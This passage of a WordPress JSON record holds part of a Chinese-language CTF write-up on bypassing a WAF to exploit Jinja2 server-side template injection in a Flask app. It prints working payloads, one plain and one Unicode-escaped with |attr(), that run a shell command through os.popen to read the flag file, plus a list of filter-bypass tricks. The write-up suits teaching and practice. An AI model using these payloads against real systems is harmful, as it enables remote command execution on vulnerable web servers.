src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306231629.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306231639-2.png\" alt=\"Pasted image 20260306231639.png\"><\/p>\n<h3>\u65b9\u6cd5\u4e09<\/h3>\n<p>Unicode \u7f16\u7801+attr()\u7ed5\u8fc7<br \/>\n<code>.<\/code>\u7b49\u4ef7\u4e8e<code>|attr()<\/code>\uff0c\u5373<code>''|attr(&quot;__class__&quot;)<\/code>\u7b49\u6548\u4e8e<code>''.__class__<\/code><\/p>\n<pre><code>{{lipsum.__globals__.get('os').popen('cat \/f*').read()}}\n<\/code><\/pre>\n<pre><code>{{lipsum|attr(&quot;\\u005f\\u005f\\u0067\\u006c\\u006f\\u0062\\u0061\\u006c\\u0073\\u005f\\u005f&quot;)|attr(&quot;\\u0067\\u0065\\u0074&quot;)(&quot;\\u006f\\u0073&quot;)|attr(&quot;\\u0070\\u006f\\u0070\\u0065\\u006e&quot;)(&quot;cat \/f*&quot;)|attr(&quot;\\u0072\\u0065\\u0061\\u0064&quot;)()}}\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232621-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232621-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20260306232621.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2026\/03\/Pasted-image-20260306232630-2.png\" alt=\"Pasted image 20260306232630.png\"><\/p>\n<h1>\u603b\u7ed3<\/h1>\n<ul>\n<li>\u5341\u516d\u8fdb\u5236\u3001Unicode \u7f16\u7801\u7ed5\u8fc7\u5173\u952e\u5b57\u8fc7\u6ee4<\/li>\n<li>\u65b9\u62ec\u53f7\u00a0<code>[]<\/code>\u66ff\u6362<code>.<\/code><\/li>\n<li>\u8fc7\u6ee4\u5173\u952e\u5b57\u4f7f\u7528+\u62fc\u63a5\u7ed5\u8fc7<\/li>\n<li>request\u7ed5\u8fc7\uff1a\u9884\u8bbe\u67e5\u8be2\u53c2\u6570+\u4eceurl\u4e2d\u4f20\u9012\u503c\u62fc\u63a5\u7684\u65b9\u6cd5\u6765\u7ed5\u8fc7\u76f4\u63a5\u5bf9\u6a21\u677f\u53c2\u6570\u7684\u8fc7\u6ee4<\/li>\n<li>attr()\u7ed5\u8fc7\uff1a|attr()\u66ff\u6362<code>.<\/code><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u8bbf\u95ee\u9898\u76ee \u4e0b\u8f7d\u6e90\u7801app.py \u4e8c\u3001\u4ee3\u7801\u5ba1\u8ba1 import os import re from flask [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[70,90],"class_list":["post-3053","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-ssti","tag-waf"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=3053"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053\/revisions"}],"predecessor-version":[{"id":3054,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/3053\/revisions\/3054"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=3053"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=3053"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=3053"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}